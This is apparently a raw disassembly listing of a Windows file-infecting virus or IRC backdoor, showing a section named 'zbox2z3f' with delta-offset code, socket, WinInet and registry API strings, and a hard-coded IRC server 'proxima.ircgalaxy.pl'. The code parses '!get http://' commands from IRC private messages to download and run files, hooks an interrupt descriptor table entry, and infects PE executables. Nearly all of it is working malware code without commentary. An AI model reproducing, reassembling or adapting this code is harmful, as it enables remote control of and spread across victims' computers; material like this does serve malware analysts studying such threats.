aRtlunicodestri	db 'RtlUnicodeStringToAnsiString',0
aWsastartup	db 'WSAStartup',0
aClosesocket	db 'closesocket',0
aConnect	db 'connect',0
aGethostbyname	db 'gethostbyname',0
aRecv		db 'recv',0
aSend		db 'send',0
aSocket		db 'socket',0
aInternetcloseh	db 'InternetCloseHandle',0
aInternetgetcon	db 'InternetGetConnectedState',0
aInternetopena	db 'InternetOpenA',0
aInternetopenur	db 'InternetOpenUrlA',0
aInternetreadfi	db 'InternetReadFile',0
aAdvapi32_dll	db 'ADVAPI32.DLL',0
aRegclosekey	db 'RegCloseKey',0
aRegopenkeyexa	db 'RegOpenKeyExA',0
aRegqueryvaluee	db 'RegQueryValueExA',0
aRegsetvalueexa	db 'RegSetValueExA',0

; =============== S U B	R O U T	I N E =======================================



sub_4917D0	proc near		; CODE XREF: zbox2z3f:00491873p
					; zbox2z3f:00491884p ...

var_5		= byte ptr -5

		sub	ecx, 5
		sub	ecx, eax
		push	ecx
		push	0E8000000h
		lea	ecx, [esp+8+var_5]
		push	0
		push	5
		push	ecx
		push	eax
		push	ebx
		push	5
		mov	ecx, esp
		push	eax
		mov	edx, esp
		push	eax
		push	esp
		push	40h
		push	ecx
		push	edx
		push	ebx
		call	dword ptr [ebp+4024ABh]
		add	esp, 0Ch
		call	dword ptr [ebp+4024AFh]
		add	esp, 8
		retn
sub_4917D0	endp

; ---------------------------------------------------------------------------
		push	edi
		lea	eax, dword_40149F[ebp]
		xor	edi, edi
		push	eax
		push	0
		push	6
		call	dword ptr [ebp+40246Bh]
		test	eax, eax
		jz	short loc_49189E
		push	eax
		push	5839h
		mov	edx, esp
		push	0
		mov	ecx, esp
		push	4
		push	100000h
		push	2
		push	edx
		push	0
		push	5839h
		push	0
		push	ecx
		push	ebx
		push	eax
		call	dword ptr [ebp+4024A3h]
		pop	edi
		pop	ecx
		call	dword ptr ss:loc_402407[ebp]
		test	edi, edi
		jz	short loc_49189E
		mov	ecx, dword ptr ss:loc_401488[ebp]
		jecxz	short loc_491867
		lea	edx, sub_401000[ebp]
		add	edx, ecx
		push	edi
		push	ebx
		call	edx	; GetModuleHandleA

loc_491867:				; CODE XREF: zbox2z3f:00491859j
		mov	eax, [ebp+402497h]
		lea	ecx, [edi+1379h]
		call	sub_4917D0
		mov	eax, [ebp+40249Bh]
		lea	ecx, [edi+13C6h]
		call	sub_4917D0
		mov	eax, [ebp+40249Fh]
		test	eax, eax
		jz	short loc_49189E
		lea	ecx, [edi+13D3h]
		call	sub_4917D0

loc_49189E:				; CODE XREF: zbox2z3f:0049181Dj
					; zbox2z3f:00491851j ...
		mov	eax, edi
		pop	edi
		retn
; ---------------------------------------------------------------------------
		push	ebp
		call	$+5
		pop	ebp
		sub	ebp, 4018A8h
		xor	ecx, ecx
		lea	eax, [ebp+401C3Eh]
		push	ecx
		push	esp
		push	ecx
		push	ecx
		push	eax
		push	ecx
		push	ecx
		call	dword ptr [ebp+402437h]
		xchg	eax, [esp]
		call	dword ptr ss:loc_402407[ebp]
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------
		db 55h,	0E8h, 0
		dd 5D000000h, 18D7ED81h, 0FF6A0040h, 18A2958Dh,	52500040h
		dd 2420CDh, 0C483002Ah,	85C7660Ch, 4018E8h, 85C720CDh
		dd 4018EAh, 2A0024h, 16AC35Dh, 33FF016Ah, 0FF0473FFh, 74C08515h
		dd 0B68F0h, 0D08B0000h,	3C50035Bh, 1906B58Dh, 0BA8B0040h
		dd 10Ch, 1088A8Bh, 0F8030000h, 8B60CB2Bh, 61A6F3CBh, 0E2470574h
		dd 83C2EBF5h, 8B570FC7h, 0CC8B53D4h, 406A5450h,	0FF6A5251h
		dd 24AB95FFh, 0C4830040h, 3F958B0Ch, 2B004024h,	7EA83D7h
		dd 6A07C7h, 578900E8h, 9569C303h, 402501h, 8088405h, 0B042C033h
		dd 195891Ah, 0F7004025h, 61428DE2h, 75C9FEAAh, 0E855C3E1h
		dd 0
; ---------------------------------------------------------------------------
		pop	ebp
		sub	ebp, 401998h
		mov	ebx, [ebp+402505h]
		cmp	dword ptr [esp+8], 0
		jz	loc_491A69
		sub	esp, 208h
		push	esp
		push	104h
		call	dword ptr [ebp+402457h]
		mov	edi, esp
		lea	eax, [esp+104h]
		push	eax
		push	0
		call	near ptr loc_4919D6+1
		push	esi
		push	edx
		push	esp

loc_4919D6:				; CODE XREF: zbox2z3f:004919CEp
		add	[edi-1], dl
		xchg	eax, ebp
		push	ebx
		and	al, 40h
		add	[ebx], dh
		leave
		lea	edx, [edi+104h]
		push	ecx
		push	ecx
		push	2
		push	ecx
		push	1
		push	40000000h
		push	edx
		call	dword ptr ss:loc_402427[ebp]
		xchg	eax, esi
		test	esi, esi
		jz	short loc_491A59

loc_4919FE:				; CODE XREF: zbox2z3f:00491A2Cj
		push	eax
		push	esp
		push	104h
		push	edi
		push	dword ptr [esp+220h]
		call	dword ptr ss:loc_4024E3[ebp]
		pop	ecx
		test	eax, eax
		jz	short loc_491A2E
		jecxz	short loc_491A2E
		push	eax
		mov	edx, esp
		push	0
		push	edx
		push	ecx
		push	edi
		push	esi
		call	dword ptr ss:loc_40248F[ebp]
		pop	ecx
		test	eax, eax
		jnz	short loc_4919FE

loc_491A2E:				; CODE XREF: zbox2z3f:00491A16j
					; zbox2z3f:00491A18j
		push	esi
		call	dword ptr ss:loc_402407[ebp]
		lea	edx, [edi+44h]
		push	edx
		push	edi
		push	44h
		pop	eax
		lea	edx, [edi+104h]
		stosd
		xor	eax, eax
		push	10h
		pop	ecx
		rep stosd
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	edx
		call	dword ptr [ebp+40242Fh]

loc_491A59:				; CODE XREF: zbox2z3f:004919FCj
		add	esp, 208h
		push	dword ptr [esp+8]
		call	dword ptr [ebp+4024D3h]

loc_491A69:				; CODE XREF: zbox2z3f:004919AAj
		push	ebx
		call	dword ptr [ebp+4024D3h]
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------
		cmp	byte ptr [esi],	0Ah
		jnz	short loc_491A7A
		inc	esi

loc_491A7A:				; CODE XREF: zbox2z3f:00491A77j
		mov	ecx, [ebp+401484h]
		jecxz	short loc_491A9B
		lea	edx, sub_401000[ebp]
		add	edx, ecx
		push	esi
		call	edx	; GetModuleHandleA
		test	al, al
		js	loc_491BB4
		jz	loc_491BAB

loc_491A9B:				; CODE XREF: zbox2z3f:00491A80j
		cmp	byte ptr [esi],	3Ah
		jnz	short loc_491AB0

loc_491AA0:				; CODE XREF: zbox2z3f:00491AADj
		inc	esi
		cmp	byte ptr [esi],	0
		jz	loc_491BAB
		cmp	byte ptr [esi],	20h
		jnz	short loc_491AA0
		inc	esi

loc_491AB0:				; CODE XREF: zbox2z3f:00491A9Ej
		cmp	dword ptr [esi], 474E4950h
		jnz	short loc_491AFA
		mov	ecx, edi
		mov	byte ptr [esi+1], 4Fh
		sub	ecx, esi
		push	ecx
		push	0
		push	ecx
		push	esi
		push	ebx
		call	dword ptr ss:loc_4024CB[ebp]
		pop	ecx
		cmp	eax, ecx
		jnz	loc_491BB4
		lea	eax, [ebp+401C32h]
		push	0
		push	0Ch
		push	eax
		push	ebx
		call	dword ptr ss:loc_4024CB[ebp]
		cmp	eax, 0Ch
		jnz	loc_491BB4
		jmp	loc_491BAB
; ---------------------------------------------------------------------------

loc_491AFA:				; CODE XREF: zbox2z3f:00491AB6j
		cmp	dword ptr [esi], 56495250h
		jnz	loc_491BAB
		add	esi, 8

loc_491B09:				; CODE XREF: zbox2z3f:00491B14j
		lodsb
		cmp	al, 0Dh
		jz	loc_491BAB
		cmp	al, 20h
		jnz	short loc_491B09
		lodsb
		cmp	al, 3Ah
		jnz	loc_491BAB
		lodsd
		or	eax, 20202020h
		cmp	eax, 74656721h
		jnz	short loc_491BAB
		lodsb
		cmp	al, 20h
		jnz	short loc_491BAD
		cmp	dword ptr [esi-1], 74746820h
		jnz	short loc_491BAB
		cmp	dword ptr [esi+3], 2F2F3A70h
		jnz	short loc_491BAB
		mov	byte ptr [edi-1], 0
		rdtsc
		mov	edx, 2710h
		mul	edx
		push	edx
		call	dword ptr ss:loc_402483[ebp]
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	near ptr loc_491B69+2
		inc	esp
		outsd
		ja	short loc_491BD4
		insb
		outsd
		popa

loc_491B69:				; CODE XREF: zbox2z3f:00491B5Dp
		db	64h
		add	bh, bh
		xchg	eax, ebp
; ---------------------------------------------------------------------------
		dd offset loc_4024DB
; ---------------------------------------------------------------------------
		test	eax, eax
		jz	short loc_491BAB
		xor	ecx, ecx
		mov	[ebp+402505h], eax
		push	ecx
		push	80000200h
		push	ecx
		push	ecx
		push	esi
		push	eax
		call	dword ptr [ebp+4024DFh]
		lea	edx, loc_401992[ebp]
		push	eax
		xor	ecx, ecx
		push	esp
		push	ecx
		push	eax
		push	edx
		push	ecx
		push	ecx
		call	dword ptr [ebp+402437h]
		xchg	eax, [esp]
		call	dword ptr ss:loc_402407[ebp]

loc_491BAB:				; CODE XREF: zbox2z3f:00491A95j
					; zbox2z3f:00491AA4j ...
		clc
		retn
; ---------------------------------------------------------------------------

loc_491BAD:				; CODE XREF: zbox2z3f:00491B2Fj
		or	byte ptr [ebp+401477h],	1

loc_491BB4:				; CODE XREF: zbox2z3f:00491A8Fj
					; zbox2z3f:00491ACFj ...
		stc
		retn
; ---------------------------------------------------------------------------
		dw 4F53h
		dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
		dd 73776F64h, 7275435Ch
; ---------------------------------------------------------------------------

loc_491BD4:				; CODE XREF: zbox2z3f:00491B64j
		jb	short near ptr loc_491C3A+1
		outsb
		jz	short loc_491C2F
		db	65h
		jb	short near ptr loc_491C4B+4
		imul	ebp, [edi+6Eh],	7078455Ch
		insb
		outsd
		jb	short near ptr loc_491C4B+1
		jb	short $+2
		push	ebp
		outsb
		imul	esi, [ecx+75h],	736F4865h
		jz	short $+2
		add	al, [eax]
		push	eax
; ---------------------------------------------------------------------------
		dd 0
aProxima_ircgal	db 'proxima.ircgalaxy.pl',0
		db 4Eh,	49h, 43h
		dd 7769204Bh, 736A6779h, 550A6C62h, 20524553h, 30323069h
		dd 20313035h
; ---------------------------------------------------------------------------
		and	cs:[esi], ch

loc_491C2F:				; CODE XREF: zbox2z3f:00491BD7j
		and	[edx], bh
		pop	edi
		dec	edx
		dec	edi
		dec	ecx
		dec	esi
		and	[esi], ah
		jbe	short near ptr loc_491CA2+1

loc_491C3A:				; CODE XREF: zbox2z3f:loc_491BD4j
		jb	short near ptr loc_491CAF+1
		jnz	short near ptr loc_491C45+3
		push	ebp
		call	$+5
		pop	ebp

loc_491C45:				; CODE XREF: zbox2z3f:00491C3Cj
		sub	ebp, offset loc_401C44

loc_491C4B:				; CODE XREF: zbox2z3f:00491BE5j
					; zbox2z3f:00491BD9j
		mov	byte ptr [ebp+401477h],	0
		call	dword ptr [ebp+40245Bh]
		shr	eax, 1Fh
		jz	short loc_491C99
		push	1Eh
		mov	esi, [ebp+40241Bh]
		pop	ecx

loc_491C66:				; CODE XREF: zbox2z3f:loc_491C95j
		lodsb
		cmp	al, 2Eh
		jnz	short loc_491C95
		cmp	word ptr [esi],	1DFFh
		jnz	short loc_491C95
		lea	edi, loc_4024FB[ebp]
		mov	esi, [esi+2]
		push	edi
		movsd
		movsw
		lea	eax, [ebp+40234Fh]
		pop	dword ptr ss:loc_402375[ebp]
		cli
		mov	[esi-6], eax
		mov	word ptr [esi-2], cs
		sti
		mov	cl, 1

loc_491C95:				; CODE XREF: zbox2z3f:00491C69j
					; zbox2z3f:00491C70j
		loop	loc_491C66
		jmp	short loc_491CDC
; ---------------------------------------------------------------------------

loc_491C99:				; CODE XREF: zbox2z3f:00491C5Bj
		lea	eax, dword_40149F[ebp]
		push	eax
		push	0

loc_491CA2:				; CODE XREF: zbox2z3f:00491C38j
		push	6
		call	dword ptr [ebp+40246Bh]
		cmp	dword ptr [esp+8], 4

loc_491CAF:				; CODE XREF: zbox2z3f:loc_491C3Aj
		jnz	short loc_491CDC
		call	near ptr loc_491CB9+1
		push	ebx
		inc	esi
		inc	ebx

loc_491CB9:				; CODE XREF: zbox2z3f:00491CB1p
		add	bh, bh
		xchg	eax, ebp
		dec	edi
		and	al, 40h
		add	al, ch
		dec	esp
		cld
; ---------------------------------------------------------------------------
		db 0FFh
		dd 7E8FFh, 46530000h, 534F5F43h, 4F95FF00h, 0E8004024h
		dd 0FFFFFC35h
; ---------------------------------------------------------------------------

loc_491CDC:				; CODE XREF: zbox2z3f:00491C97j
					; zbox2z3f:loc_491CAFj
		call	sub_49112A
		dec	dword ptr [ebp+401262h]
		call	near ptr loc_491CF6+1
		push	ebp
		push	ebx
		inc	ebp
		push	edx
		xor	esi, [edx]
		db	2Eh
		inc	esp
		dec	esp
		dec	esp

loc_491CF6:				; CODE XREF: zbox2z3f:00491CE7p
		add	bh, bh
		xchg	eax, ebp
		arpl	[eax+eax*2], sp
		add	al, ch
		or	al, [eax]
; ---------------------------------------------------------------------------
		dd 73770000h, 6E697270h, 416674h, 1395FF50h, 89004024h
		dd 40241F85h, 8D310F00h, 4017898Dh, 1858900h, 51004025h
		dd 246395FFh, 68930040h, 4, 1796B58Dh, 8D590040h, 4024E7BDh
		dd 0F746E800h, 0C766FFFFh, 401BF685h, 83F0FF00h, 401BF8A5h
		dd 958D0000h, 401BB6h, 16A5450h, 6852006Ah, 80000002h
		dd 24EB95FFh, 0C0850040h, 8D22755Ah, 401BE98Dh,	66A5200h
		dd 1BF6B58Dh, 56540040h, 52515050h, 24EF95FFh, 0FF580040h
		dd 4024E795h, 885C600h,	4027h, 0CE8h, 4F535700h, 32334B43h
		dd 4C4C442Eh, 6395FF00h, 93004024h, 768h, 0EDB58D00h, 59004016h
		dd 24B7BD8Dh, 0C1E80040h, 0E8FFFFF6h, 0Ch, 494E4957h, 2E54454Eh
		dd 4C4C44h, 246395FFh, 0C0850040h, 1E7840Fh, 68930000h
		dd 5, 172BB58Dh, 8D590040h, 4024D3BDh, 0F68AE800h, 0BD83FFFFh
		dd 4024D7h, 0C2840F00h,	81000001h, 190ECh, 1685400h, 0FF000001h
		dd 4024B795h, 90C48100h, 50000001h, 6AD48Bh, 0D795FF52h
		dd 85004024h, 0D7559C0h, 138868h, 8395FF00h, 0EB004024h
		dd 0F8BD83E2h, 401Bh, 858D2975h, 401BFCh, 0C395FF50h, 85004024h
		dd 3B840FC0h, 8B000001h, 8B0C40h, 858F30FFh, 401BF8h, 270885C6h
		dd 6A010040h, 6A016A00h, 0CF95FF02h, 83004024h,	840FFFF8h
		dd 112h, 0F4958D93h, 6A00401Bh,	0FF535210h, 4024BF95h
		dd 0FC08500h, 0F285h, 16BD8D00h, 0B100401Ch, 0FAC0E808h
		dd 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h, 40245Fh
		dd 1C24BD8Dh, 1B10040h,	0FFFAA1E8h, 24448BFFh, 8E0C110h
		dd 424440Bh, 0B08E0C1h,	50082444h, 5E8h, 362E2500h, 0FF570078h
		dd 40241F95h, 0CC48300h, 200647C6h, 1C11958Dh, 6A0040h
		dd 2168h, 0FF535200h, 4024CB95h, 247C8D00h, 95FF5714h
		dd 402423h, 0A3804C6h, 50006A40h, 95FF5357h, 4024CBh, 0BD8DE603h
		dd 401C32h, 0C68006Ah, 57000000h, 0CB95FF53h, 3D004024h
		dd 0Ch,	0B58D4D75h, 402509h, 27088D8Dh,	0CE2B0040h, 5651006Ah
		dd 0C795FF53h, 83004024h, 2F7E00F8h, 8DFE8B91h,	402509B5h
		dd 0F20DB000h, 601075AEh, 0FFFAF7E8h, 177261FFh, 778D09E3h
		dd 8BEAEB01h, 8DCE2BCFh, 402509BDh, 87A4F300h, 53B9EBF7h
		dd 24BB95FFh, 0BD800040h, 401477h, 682A7401h, 7530h, 248395FFh
		dd 0BD800040h, 402708h,	0C7117400h, 401BF885h, 0
		dd 885C600h, 4027h, 0FFFE56E9h,	8085C7FFh, 4014h, 5D800000h
		dd 8D0004C2h, 402709B5h, 95FF5600h, 402443h, 0FFFF883h
		dd 0BB84h, 0D858900h, 6A004028h, 95FF5600h, 40247Bh, 840FC085h
		dd 0A4h, 5050C02Bh, 6A50036Ah, 6801h, 0FF56C000h, 40242795h
		dd 0FFF88300h, 2E4840Fh, 85890000h, 402811h, 28158D8Dh
		dd 958D0040h, 40281Dh, 6A5251h,	4B95FF50h, 83004024h, 840FFFF8h
		dd 2B2h, 0B5FF006Ah, 402811h, 244795FFh, 0F8830040h, 9B840FFFh
		dd 89000002h, 40282585h, 3C93300h, 515051C3h, 0FF51046Ah
		dd 402811B5h, 2B95FF00h, 85004024h, 77840FC0h, 33000002h
		dd 298589C9h, 51004028h, 1F685151h, 50000F00h, 246795FFh
		dd 0C0850040h, 230840Fh, 85890000h, 40282Dh, 384B8BC3h
		dd 5838B8h, 3D23300h, 0F7F1F7C1h, 358589E1h, 8B004028h
		dd 6B83C4Bh, 33000014h,	0F7C103D2h, 89E1F7F1h, 40283185h
		dd 0B70FC300h, 0E3F9064Bh, 18538D36h, 1443B70Fh, 6B49D003h
		dd 0D00328C1h, 775F3A81h, 74F96E69h, 7A83491Eh,	0DF72010Ch
		dd 8B3C4B8Bh, 42031442h, 48448D10h, 23D9F7FFh, 25853BC1h
		dd 0C3004028h, 24448B59h, 0B888890Ch, 33000000h, 0CF8BC3C0h
		dd 0BD8D0BEBh, 402709h,	33DF8BFCh, 613CACC9h, 7A3C0672h
		dd 202C0277h, 745C3CAAh, 742E3CECh, 75003CDDh, 8BC8E3E8h
		dd 58453D01h, 0B740045h, 5243533Dh, 49850F00h, 8BFFFFFFh
		dd 49573D03h, 840F434Eh, 0FFFFFF3Ch, 5543573Dh,	31840F4Eh
		dd 3DFFFFFFh, 32334357h, 0FF26840Fh, 503DFFFFh,	0F4F5453h
		dd 0FFFF1B84h, 0E8DB33FFh, 0FFFFFE43h, 0FF0E840Fh, 0D233FFFFh
		dd 16E8h, 0FF6EE800h, 0E8FFFFh,	5D000000h, 21B3ED81h, 0F9E90040h
		dd 64000000h, 0B58B32FFh, 40282Dh, 66228964h, 5A4D3E81h
		dd 0E2850Fh, 5E8B0000h,	66DE033Ch, 45503B81h, 0D2850Fh
		dd 43F70000h, 200016h, 0C5850F00h, 0F6000000h, 0F025C43h
		dd 0BB84h, 207E8100h, 20202020h, 0AE840Fh, 0CFE80000h
		dd 0FFFFFFEh, 0A382h, 0FE97E800h, 0A2E8FFFFh, 8B000000h
		dd 4028319Dh, 0FDB5E800h, 840FFFFFh, 88h, 282DB58Bh, 5E8B0040h
		dd 0E8DE033Ch, 0FFFFFE9Eh, 4A817672h, 6024h, 56FE8BE0h
		dd 8D147A03h, 401000B5h, 107A0300h, 501B9h, 0A5F35700h
		dd 2E303B1h, 5E5FA4F3h,	92310F52h, 155878Dh, 50880000h
		dd 0EECBE8FFh, 8B5AFFFFh, 4A030C4Ah, 5418D10h, 8928432Bh
		dd 46C71247h, 20202020h, 284B8920h, 8B104A8Bh, 40283185h
		dd 84A3900h, 4A890373h,	10420108h, 586383h, 2835858Bh
		dd 42010040h, 50430108h, 8B64D233h, 28F6422h, 11BD8358h
		dd 4028h, 0FDE2840Fh, 0B5FFFFFFh, 40282Dh, 248795FFh, 0B5FF0040h
		dd 402829h, 240795FFh, 8D8D0040h, 402815h, 281D958Dh, 52510040h
		dd 0B5FF006Ah, 402811h,	247F95FFh, 0B5FF0040h, 402811h
		dd 240795FFh, 0B58D0040h, 402709h, 280DB5FFh, 0FF560040h
		dd 40247B95h, 11A58300h, 4028h,	0E8C3h,	6A5D0000h, 2EED8101h
		dd 58004023h, 85C10FF0h, 401480h, 83C3C085h, 0FF0FFC8h
		dd 148085C1h, 3DC30040h, 2A0010h, 81661C75h, 6C0C247Ch
		dd 60137571h, 0FFFFC4E8h, 0E80575FFh, 0FFFFFDC2h, 0FFFFD2E8h
		dd 0FF2E61FFh, 3456782Dh, 0AAE86012h, 75FFFFFFh, 24448B39h
		dd 9B58D30h, 8B004027h,	81660850h, 7302063Ah, 685625h
		dd 8B00FF00h, 52006AC4h, 0B395FF50h, 83004024h,	3E8108C4h
		dd 5C3F3F5Ch, 0C6830375h, 0FD74E804h, 84E8FFFFh, 61FFFFFFh
		dd 25B8h, 2FB8C300h, 0E8000000h, 10h, 0B80020C2h, 30h
		dd 3E8h, 24C200h, 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h
		dd 24548B00h, 1A8B5D30h, 23F1ED81h, 4E80040h, 61FFFFF4h
		dd 630004C2h, 0DE77E779h, 7D77E737h, 0FD77F515h, 77E7A5h
		dd 2 dup(0)
		dd 72000000h, 3777E746h, 9777E7A8h, 0B877E777h,	8377E61Bh
		dd 3777E7AAh, 0E777E7ACh, 4977EBB1h, 0AB77E73Ch, 0EF77E74Ch
		dd 0E277E793h, 9377E73Ch, 8F77E79Fh, 3477E6AFh,	8677E6ADh
		dd 5777E7C4h, 0D877E7C6h, 7677E805h, 1577E74Dh,	0B777E7C8h
		dd 9577E706h, 0E977EBA5h, 9677EBA6h, 1A77E703h,	0E677E701h
		dd 9077E61Bh, 0A77E750h, 8C77E798h, 6377E79Dh, 377F7E4h
		dd 0A377F7E6h, 0B377F7E6h, 7377F7E6h, 6377F7EAh, 4377F7EBh
		dd 377F7ECh, 3377F7F5h,	77F526h, 12D2h dup(0)
zbox2z3f	ends

; Section 9. (virtual address 00097000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00097000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 497000h
		align 2000h
_idata2		ends


		end start